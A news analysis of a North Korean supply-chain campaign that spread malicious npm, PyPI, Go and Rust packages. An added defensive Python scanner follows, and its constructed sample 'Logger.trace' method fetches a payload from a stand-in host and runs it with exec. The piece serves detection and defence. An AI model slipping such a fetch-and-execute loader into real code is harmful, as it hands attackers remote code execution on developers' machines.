
N. Korean Hackers Spread 1,700 Malicious Packages Across Npm, PyPI, Go, Rust
Why It Matters
The widespread, cross‑ecosystem supply‑chain compromise gives attackers persistent footholds in developer environments, raising the risk of data theft and financial loss for enterprises that rely on open‑source packages. It signals an escalating threat from state‑backed actors targeting the software development supply chain.
Key Takeaways
- 1,700 malicious packages across npm, PyPI, Go, Rust, Packagist.
- Packages load infostealer/RAT stealing browsers, password managers, crypto wallets.
- Malware can log keystrokes, upload files, and deploy AnyDesk.
- Malicious code hides in legitimate functions, not triggered on install.
- UNC1069/BlueNoroff linked; shows persistent, cross‑ecosystem supply‑chain threat.
Pulse Analysis
Supply‑chain attacks have become a cornerstone of cyber‑espionage, and the latest North Korean operation illustrates how state‑backed actors are scaling this model. Since early 2025, UNC1069’s Contagious Interview campaign has injected over 1,700 malicious libraries into five of the most popular package registries. By leveraging the trust developers place in open‑source components, the group creates a low‑profile entry point that bypasses traditional perimeter defenses, expanding the attack surface far beyond a single language or platform.
Technical analysis reveals that the compromised packages act as silent loaders, pulling second‑stage payloads that combine infostealer functions with full remote‑access trojan capabilities. The malware harvests credentials from browsers, password managers and cryptocurrency wallets, while also providing post‑compromise tools such as keystroke logging, file exfiltration, encrypted archives and AnyDesk remote sessions. Crucially, the malicious code is woven into legitimate‑looking functions—e.g., a Logger::trace method—so it remains dormant during installation and evades static scanning tools, only activating when the targeted function is called.
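Because the loader stays dormant until a legitimate-looking function is called, install-time scanning misses it; one defender-side check is a static pass over package source that flags any function body combining a remote fetch with dynamic code execution. The following is an added example, not code from the article or from any analysed package; the `Logger.trace` sample source is constructed here to mirror the pattern described above, and the call-name lists are an assumption that a real scanner would extend.

```python
import ast

# Assumed heuristic: a function that both fetches remote bytes and executes code is a loader candidate.
NETWORK_CALLS = {"urlopen", "urlretrieve", "get", "post"}
EXEC_CALLS = {"exec", "eval", "compile"}


def _call_name(node: ast.Call):
    """Return the bare callee name, e.g. 'urlopen' for urllib.request.urlopen(...)."""
    f = node.func
    if isinstance(f, ast.Name):
        return f.id
    if isinstance(f, ast.Attribute):
        return f.attr
    return None


class LoaderFinder(ast.NodeVisitor):
    """Collect dotted names (Class.method) of functions matching the loader heuristic."""

    def __init__(self):
        self.scope, self.findings = [], []

    def visit_ClassDef(self, node):
        self.scope.append(node.name)
        self.generic_visit(node)
        self.scope.pop()

    def visit_FunctionDef(self, node):
        # ast.walk covers nested calls, so an enclosing function is flagged too
        names = {_call_name(n) for n in ast.walk(node) if isinstance(n, ast.Call)}
        if names & NETWORK_CALLS and names & EXEC_CALLS:
            self.findings.append(".".join(self.scope + [node.name]))
        self.scope.append(node.name)
        self.generic_visit(node)
        self.scope.pop()

    visit_AsyncFunctionDef = visit_FunctionDef


def find_dormant_loaders(source: str) -> list[str]:
    """Parse Python source (never executed) and return functions that fetch and run remote code."""
    finder = LoaderFinder()
    finder.visit(ast.parse(source))
    return finder.findings


# Constructed sample package source: benign info(), a plain fetch, and a trace() hiding a loader.
SAMPLE = '''
import urllib.request

def fetch_config(url):
    return urllib.request.urlopen(url).read()

class Logger:
    def info(self, msg):
        print("[info]", msg)

    def trace(self, msg):
        payload = urllib.request.urlopen("http://stage2.example.invalid/p").read()
        exec(compile(payload, "<stage2>", "exec"))
        print("[trace]", msg)
'''

if __name__ == "__main__":
    print(find_dormant_loaders(SAMPLE))  # ['Logger.trace']
```

The scanner only parses source, so it can be run in CI over every dependency before anything is imported; `fetch_config` is not flagged because it never executes what it fetches.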
For enterprises, the campaign underscores the urgency of adopting robust software‑bill‑of‑materials (SBOM) practices, continuous monitoring of dependency updates, and automated provenance verification. Security teams must also enforce strict access controls on package publishing accounts and employ runtime detection solutions that can spot anomalous behavior in trusted libraries. As North Korean groups continue to refine their supply‑chain tactics, organizations that treat open‑source components as a critical attack vector will be better positioned to mitigate the financial and reputational fallout of such incursions.